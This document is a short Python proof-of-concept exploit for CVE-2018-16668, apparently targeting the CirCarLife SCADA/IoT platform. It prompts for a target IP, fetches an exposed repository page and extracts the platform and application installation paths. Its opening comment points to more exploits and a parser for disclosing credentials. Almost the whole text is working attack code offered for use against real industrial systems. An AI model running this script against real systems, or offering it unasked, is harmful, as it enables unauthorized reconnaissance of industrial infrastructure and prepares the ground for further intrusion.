#POC for CVE-2018-16668 #More POCs and complete log parser for credentials and system specifications disclosure at https://github.com/SadFud/Exploits/tree/master/Real%20World/SCADA%20-%20IOT%20Systems import requests from termcolor import colored def repository(): print colored('[*] Getting installation paths via CVE-2018-16668', 'blue') path = requests.get(target1 + '/html/repository') rutas = path.text.encode("utf8").split('\n') platformpath = rutas[1].split(' ') platformpath = platformpath[0] appsrc = rutas[3] appsrc = rutas[3].split(' ') appsrc = appsrc[0] raiz = str(appsrc).find('/circarlife/') appsrc = appsrc[0:raiz+len('/circarlife/')] print colored('[+] Platform installation path: ', 'green') + platformpath print colored('[+] Application installation path: ', 'green') + appsrc url = raw_input('Insert target ip: ') target1 = 'http://' + url repository()
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